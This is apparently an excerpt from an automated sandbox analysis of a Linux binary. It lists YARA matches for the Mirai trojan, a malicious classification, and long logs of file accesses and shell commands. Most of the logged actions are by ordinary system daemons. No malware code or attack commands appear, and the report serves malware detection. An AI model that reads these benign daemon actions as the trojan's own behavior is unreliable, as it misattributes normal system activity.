      Source: 6219.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a56423b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 117d6eb47f000c9d475119ca0e6a1b49a91bbbece858758aaa3d7f30d0777d75, id = 3a56423b-c0cf-4483-87e3-552beb40563a, last_modified = 2021-09-16
      Source: 6219.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_575f5bc8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 58e22a2acd002b07e1b1c546e8dfe9885d5dfd2092d4044630064078038e314f, id = 575f5bc8-b848-4db4-a99c-132d4d2bc8a4, last_modified = 2021-09-16
      Source: 6219.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6e8e9257 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4bad14aebb0b8c7aa414f38866baaf1f4b350b2026735de24bcf2014ff4b0a6a, id = 6e8e9257-a6d5-407a-a584-4656816a3ddc, last_modified = 2021-09-16
      Source: 6219.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_dab39a25 reference_sample = 3e02fb63803110cabde08e809cf4acc1b8fb474ace531959a311858fdd578bab, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 5a628d9af9d6dccf29e78f780bb74a2fa25167954c34d4a1529bdea5ea891ac0, id = dab39a25-852b-441f-86ab-23d945daa62c, last_modified = 2022-01-26
      Source: 6217.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_aa39fb02 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b136ba6496816ba9737a3eb0e633c28a337511a97505f06e52f37b38599587cb, id = aa39fb02-ca7e-4809-ab5d-00e92763f7ec, last_modified = 2021-09-16
      Source: 6217.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a56423b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 117d6eb47f000c9d475119ca0e6a1b49a91bbbece858758aaa3d7f30d0777d75, id = 3a56423b-c0cf-4483-87e3-552beb40563a, last_modified = 2021-09-16
      Source: 6217.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_575f5bc8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 58e22a2acd002b07e1b1c546e8dfe9885d5dfd2092d4044630064078038e314f, id = 575f5bc8-b848-4db4-a99c-132d4d2bc8a4, last_modified = 2021-09-16
      Source: 6217.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6e8e9257 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4bad14aebb0b8c7aa414f38866baaf1f4b350b2026735de24bcf2014ff4b0a6a, id = 6e8e9257-a6d5-407a-a584-4656816a3ddc, last_modified = 2021-09-16
      Source: 6217.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_dab39a25 reference_sample = 3e02fb63803110cabde08e809cf4acc1b8fb474ace531959a311858fdd578bab, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 5a628d9af9d6dccf29e78f780bb74a2fa25167954c34d4a1529bdea5ea891ac0, id = dab39a25-852b-441f-86ab-23d945daa62c, last_modified = 2022-01-26
      Source: 6216.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_aa39fb02 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b136ba6496816ba9737a3eb0e633c28a337511a97505f06e52f37b38599587cb, id = aa39fb02-ca7e-4809-ab5d-00e92763f7ec, last_modified = 2021-09-16
      Source: 6216.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_3a56423b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 117d6eb47f000c9d475119ca0e6a1b49a91bbbece858758aaa3d7f30d0777d75, id = 3a56423b-c0cf-4483-87e3-552beb40563a, last_modified = 2021-09-16
      Source: 6216.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_575f5bc8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 58e22a2acd002b07e1b1c546e8dfe9885d5dfd2092d4044630064078038e314f, id = 575f5bc8-b848-4db4-a99c-132d4d2bc8a4, last_modified = 2021-09-16
      Source: 6216.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6e8e9257 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4bad14aebb0b8c7aa414f38866baaf1f4b350b2026735de24bcf2014ff4b0a6a, id = 6e8e9257-a6d5-407a-a584-4656816a3ddc, last_modified = 2021-09-16
      Source: 6216.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_dab39a25 reference_sample = 3e02fb63803110cabde08e809cf4acc1b8fb474ace531959a311858fdd578bab, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 5a628d9af9d6dccf29e78f780bb74a2fa25167954c34d4a1529bdea5ea891ac0, id = dab39a25-852b-441f-86ab-23d945daa62c, last_modified = 2022-01-26
      Source: classification engineClassification label: mal100.spre.troj.linELF@0/156@13/0

      Persistence and Installation Behavior

      barindex
      Source: /usr/bin/dbus-daemon (PID: 6305)File: /proc/6305/mountsJump to behavior
      Source: /bin/fusermount (PID: 6418)File: /proc/6418/mountsJump to behavior
      Source: /usr/bin/dbus-daemon (PID: 6453)File: /proc/6453/mountsJump to behavior
      Source: /usr/bin/dbus-daemon (PID: 6498)File: /proc/6498/mountsJump to behavior
      Source: /usr/bin/dbus-daemon (PID: 6598)File: /proc/6598/mountsJump to behavior
      Source: /usr/bin/dbus-daemon (PID: 6696)File: /proc/6696/mountsJump to behavior
      Source: /usr/bin/dbus-daemon (PID: 6759)File: /proc/6759/mountsJump to behavior
      Source: /usr/bin/dbus-daemon (PID: 6834)File: /proc/6834/mounts
      Source: /usr/bin/dbus-daemon (PID: 6881)File: /proc/6881/mounts
      Source: /usr/bin/dbus-daemon (PID: 6959)File: /proc/6959/mounts
      Source: /usr/bin/dbus-daemon (PID: 6991)File: /proc/6991/mounts
      Source: /usr/bin/dbus-daemon (PID: 7066)File: /proc/7066/mounts
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:76012YVxly3Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:76013uwCyQ2Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:76610GYeQO4Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:76626qD8eH2Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:76641T2AT31Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:772780LupT1Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:77279G4ZTV2Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:77402Z6h8l3Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:78121GpMmv3Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:78265Rupp53Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:78273Qt0Er0Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:78433pGJnv4Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:791822u0XQ2Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:79297L53PB2Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:79346LgIx03Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:79348jci7O4Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:79398GjARR2Jump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6240)File: /run/systemd/journal/streams/.#9:794000liax3Jump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6313)Directory: <invalid fd (18)>/..Jump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6313)Directory: <invalid fd (17)>/..Jump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6313)File: /run/systemd/seats/.#seat03NA3eAJump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6313)File: /run/systemd/users/.#127AdPKOyJump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6313)File: /run/systemd/users/.#127gXJjZyJump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6313)File: /run/systemd/seats/.#seat0JerozwJump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6313)File: /run/systemd/users/.#1270dsckxJump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6313)File: /run/systemd/users/.#127J4N8yAJump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6313)File: /run/systemd/users/.#127GFvMAzJump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6313)File: /run/systemd/users/.#127kYjEIAJump to behavior
      Source: /usr/lib/policykit-1/polkitd (PID: 6380)Directory: /root/.cacheJump to behavior
      Source: /usr/lib/gdm3/gdm-wayland-session (PID: 6451)Directory: /var/lib/gdm3/.cacheJump to behavior
      Source: /usr/lib/accountsservice/accounts-daemon (PID: 6428)Directory: /var/lib/gdm3/.pam_environmentJump to behavior
      Source: /usr/lib/accountsservice/accounts-daemon (PID: 6428)Directory: /root/.cacheJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6481)File: /run/systemd/journal/streams/.#9:81034BvpMbeJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6481)File: /run/systemd/journal/streams/.#9:810357pybyfJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6481)File: /run/systemd/journal/streams/.#9:81626tzTLaiJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6481)File: /run/systemd/journal/streams/.#9:81707cj0Z0eJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6481)File: /run/systemd/journal/streams/.#9:81723NOxs6dJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6481)File: /run/systemd/journal/streams/.#9:81801N0gy7gJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6481)File: /run/systemd/journal/streams/.#9:83049qPiJuiJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6481)File: /run/systemd/journal/streams/.#9:82387tCJJ2gJump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6504)Directory: <invalid fd (18)>/..Jump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6504)Directory: <invalid fd (17)>/..Jump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6504)File: /run/systemd/seats/.#seat0jwnOjYJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)File: /run/systemd/journal/streams/.#9:825975ECEvtJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)File: /run/systemd/journal/streams/.#9:82598gvnODtJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)File: /run/systemd/journal/streams/.#9:825993hiOquJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)File: /run/systemd/journal/streams/.#9:82600EyM8EtJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)File: /run/systemd/journal/streams/.#9:82697ewxWXtJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)File: /run/systemd/journal/streams/.#9:82786PjL4ItJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)File: /run/systemd/journal/streams/.#9:82861tgeaMwJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)File: /run/systemd/journal/streams/.#9:82868VUhcotJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)File: /run/systemd/journal/streams/.#9:82873TGamJtJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)File: /run/systemd/journal/streams/.#9:82898Mf1QixJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)File: /run/systemd/journal/streams/.#9:828998DBYetJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6590)File: /run/systemd/journal/streams/.#9:85030o1777uJump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6603)Directory: <invalid fd (18)>/..Jump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6603)Directory: <invalid fd (17)>/..Jump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6603)File: /run/systemd/seats/.#seat0y9YOXsJump to behavior
      Source: /usr/lib/accountsservice/accounts-daemon (PID: 6666)Directory: /root/.cacheJump to behavior
      Source: /usr/lib/policykit-1/polkitd (PID: 6675)Directory: /root/.cacheJump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6701)Directory: <invalid fd (18)>/..Jump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6701)Directory: <invalid fd (17)>/..Jump to behavior
      Source: /lib/systemd/systemd-logind (PID: 6701)File: /run/systemd/seats/.#seat0Ew8IDTJump to behavior
      Source: /usr/lib/policykit-1/polkitd (PID: 6773)Directory: /root/.cacheJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:85885h8DGeY
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:85886FbJ6i2
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:85887DMRhF0
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:87429aEzoc2
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:87430s7abG2
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:874319KliE0
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:87432ZVWyuY
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:87433rT96d2
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:87434QcmZO0
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:87436V5TO4Y
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:87441fIAQv1
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:87445TV4PD2
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:87460SZQbE1
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:87461Gog3N2
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:87462VLGi50
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:87463bZzxn0
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:87464EfUw01
      Source: /lib/systemd/systemd-journald (PID: 6795)File: /run/systemd/journal/streams/.#9:874676KRkcY
      Source: /lib/systemd/systemd-logind (PID: 6806)Directory: <invalid fd (18)>/..
      Source: /lib/systemd/systemd-logind (PID: 6806)Directory: <invalid fd (17)>/..
      Source: /lib/systemd/systemd-logind (PID: 6806)File: /run/systemd/seats/.#seat0vTWNXO
      Source: /usr/lib/policykit-1/polkitd (PID: 6873)Directory: /root/.cache
      Source: /lib/systemd/systemd-journald (PID: 6889)File: /run/systemd/journal/streams/.#9:89390rMnFD7
      Source: /lib/systemd/systemd-journald (PID: 6889)File: /run/systemd/journal/streams/.#9:894214zvxV8
      Source: /lib/systemd/systemd-journald (PID: 6889)File: /run/systemd/journal/streams/.#9:89430eRs0r7
      Source: /lib/systemd/systemd-journald (PID: 6889)File: /run/systemd/journal/streams/.#9:89439wVGki8
      Source: /lib/systemd/systemd-journald (PID: 6889)File: /run/systemd/journal/streams/.#9:89447lo6Os9
      Source: /lib/systemd/systemd-journald (PID: 6889)File: /run/systemd/journal/streams/.#9:88568mj5uC5
      Source: /lib/systemd/systemd-journald (PID: 6889)File: /run/systemd/journal/streams/.#9:88569wwXa55
      Source: /lib/systemd/systemd-journald (PID: 6889)File: /run/systemd/journal/streams/.#9:88570zOD3A5
      Source: /lib/systemd/systemd-journald (PID: 6889)File: /run/systemd/journal/streams/.#9:88613oIqSe7
      Source: /lib/systemd/systemd-journald (PID: 6889)File: /run/systemd/journal/streams/.#9:88622uLoFw7
      Source: /lib/systemd/systemd-journald (PID: 6889)File: /run/systemd/journal/streams/.#9:88636WbNij9
      Source: /lib/systemd/systemd-logind (PID: 6895)Directory: <invalid fd (18)>/..
      Source: /lib/systemd/systemd-logind (PID: 6895)Directory: <invalid fd (17)>/..
      Source: /lib/systemd/systemd-logind (PID: 6895)File: /run/systemd/seats/.#seat0HOIVSz
      Source: /usr/lib/policykit-1/polkitd (PID: 6967)Directory: /root/.cache
      Source: /lib/systemd/systemd-journald (PID: 7000)File: /run/systemd/journal/streams/.#9:90654TfCDQu
      Source: /lib/systemd/systemd-journald (PID: 7000)File: /run/systemd/journal/streams/.#9:90655Cx1hNt
      Source: /lib/systemd/systemd-journald (PID: 7000)File: /run/systemd/journal/streams/.#9:90664nStvVt
      Source: /lib/systemd/systemd-journald (PID: 7000)File: /run/systemd/journal/streams/.#9:907051FYtLx
      Source: /lib/systemd/systemd-journald (PID: 7000)File: /run/systemd/journal/streams/.#9:90706iHPdxu
      Source: /lib/systemd/systemd-journald (PID: 7000)File: /run/systemd/journal/streams/.#9:90707lsG5Lt
      Source: /lib/systemd/systemd-journald (PID: 7000)File: /run/systemd/journal/streams/.#9:907089jJTPt
      Source: /lib/systemd/systemd-journald (PID: 7000)File: /run/systemd/journal/streams/.#9:907092TEzDu
      Source: /lib/systemd/systemd-journald (PID: 7000)File: /run/systemd/journal/streams/.#9:90710sFFGjx
      Source: /lib/systemd/systemd-journald (PID: 7000)File: /run/systemd/journal/streams/.#9:908549f3Tyv
      Source: /lib/systemd/systemd-logind (PID: 7008)Directory: <invalid fd (18)>/..
      Source: /lib/systemd/systemd-logind (PID: 7008)Directory: <invalid fd (17)>/..
      Source: /lib/systemd/systemd-logind (PID: 7008)File: /run/systemd/seats/.#seat0bLQeT7
      Source: /usr/lib/policykit-1/polkitd (PID: 7071)Directory: /root/.cache
      Source: /usr/lib/accountsservice/accounts-daemon (PID: 7081)Directory: /root/.cache
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7000/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7000/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7000/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7000/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7000/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7000/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7066/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7068/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7068/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7068/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7068/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7068/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7068/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7068/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7001/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7001/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7001/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7001/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7001/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7001/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7001/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7067/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7067/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7067/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7067/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7067/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7067/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7067/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/6962/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/6962/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/6962/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/6962/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/6962/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/6962/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/6962/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7071/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7071/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7071/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7071/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7071/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7071/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7071/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7081/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/environ
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/sched
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/1860/cgroup
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7008/comm
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7008/cmdline
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7008/status
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7008/attr/current
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7008/sessionid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7008/loginuid
      Source: /lib/systemd/systemd-journald (PID: 7000)File opened: /proc/7008/cgroup
      Source: /usr/bin/gpu-manager (PID: 6390)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6392)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6394)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6396)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
      Source: /usr/bin/gpu-manager (PID: 6398)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
